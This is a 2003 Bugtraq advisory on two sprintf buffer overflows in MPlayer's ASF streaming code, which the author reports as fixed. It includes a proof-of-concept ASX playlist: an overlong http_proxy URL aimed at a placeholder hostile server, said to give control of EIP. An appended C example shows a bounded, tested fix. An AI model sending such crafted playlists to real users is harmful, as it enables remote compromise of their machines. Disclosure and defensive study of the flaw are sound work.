
Bugtraq mailing list archives

Mplayer Buffer Overflow
From: "Otero, Hernan" <hernan.otero () eds com>
Date: Thu, 25 Sep 2003 19:17:49 -0500


Favorite Linux Player Buffer Overflow
 

 Product:  Mplayer
 Developers:  http://www.mplayerhq.hu
 OS:    Port to All *NIX and Win32
 Remote Exploitable:  YES

The developers have been contacted and the problem was fixed; it is
recommended that you update your mplayer version.

 In the source tree there is a file called asf_streaming.c. This file has a
function named asf_http_request, and that function has two buffer overflows.
These overflows are in the sprintf lines.
 
 
 asf_http_request {
                char str[250];
                ....
                ...
                ..
                sprintf( str, "Host: %s:%d", server_url->hostname, server_url->port );
                ....
                ...     
                ..
                sprintf( str, "Host: %s:%d", url->hostname, url->port );
 
                ....
                ...
                ..
 }

 
  
 At first glance this may look like it can't be exploited (because of the
MAXHOSTLEN size restriction)... but with an ASX file like this one, if a
"badsite" listening on "badport" sends "\n\n" as its answer, it could lead to a
buffer overflow with a fully controllable EIP.
 
 
 <asx version = "3.0">
 <title>Bas Site ASX</title>
 
 <moreinfo href = "mailto:info () badsite com" />
 <logo href = "http://www.badsite.com/streaming/grupo.gif" style="ICON" />
 <banner href= "images/bannermitre.gif">
 <abstract>Bad Site live</abstract>
 <moreinfo target="_blank" href = "http://www.badsite.com/" />
 </banner>
 
 <entry>
 <title>NEWS</title>
 <AUTHOR>NEWS</AUTHOR>
 <COPYRIGHT>© All by the news</COPYRIGHT>
 <ref href =
"http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa"/>
 <logo href = "http://www.badsite.com/streaming/grupo.gif" style="ICON" />
 </entry>
 </asx>
 


 Regards,
 
   Hernán Otero
   hernan.otero () eds com 
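
The defensive counterpart to the sprintf calls quoted in the advisory, as an added example (not MPlayer's code and not the actual fix): a bounded formatter that treats truncation as an error instead of writing past the 250-byte buffer. The `url_sketch` struct, the function names and the 400-byte hostname are assumptions constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

#define HDR_BUF_LEN 250 /* same size as the str[] buffer quoted in the advisory */

/* Hypothetical stand-in for the URL structure; only the fields used here. */
struct url_sketch { const char *hostname; int port; };

/* Format "Host: <hostname>:<port>" into dst, never writing more than dstlen
 * bytes. Returns 0 on success, -1 on bad arguments or if the header would not
 * fit; the caller should then abort the request, not send a cut-off header. */
int build_host_header(char *dst, size_t dstlen, const struct url_sketch *u)
{
    int n;

    if (dst == NULL || dstlen == 0 || u == NULL || u->hostname == NULL)
        return -1;
    if (u->port < 1 || u->port > 65535)
        return -1;
    n = snprintf(dst, dstlen, "Host: %s:%d", u->hostname, u->port);
    if (n < 0 || (size_t)n >= dstlen) { /* n is the length that was needed */
        dst[0] = '\0';
        return -1;
    }
    return 0;
}

/* Constructed input: a 400-byte hostname, longer than the buffer. The guard
 * bytes placed directly after the buffer must survive the call. */
int overlong_hostname_is_rejected(void)
{
    struct { char str[HDR_BUF_LEN]; unsigned char guard[8]; } frame;
    char host[401];
    struct url_sketch u = { host, 8080 };
    int rc;

    memset(host, 'a', sizeof(host) - 1);
    host[sizeof(host) - 1] = '\0';
    memset(frame.guard, 0xA5, sizeof(frame.guard));
    rc = build_host_header(frame.str, sizeof(frame.str), &u);
    for (size_t i = 0; i < sizeof(frame.guard); i++)
        if (frame.guard[i] != 0xA5)
            return 0; /* something wrote past the buffer */
    return rc == -1 && frame.str[0] == '\0';
}

int main(void)
{
    printf("overlong hostname rejected, guard intact: %s\n",
           overlong_hostname_is_rejected() ? "yes" : "no");
    return 0;
}
```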

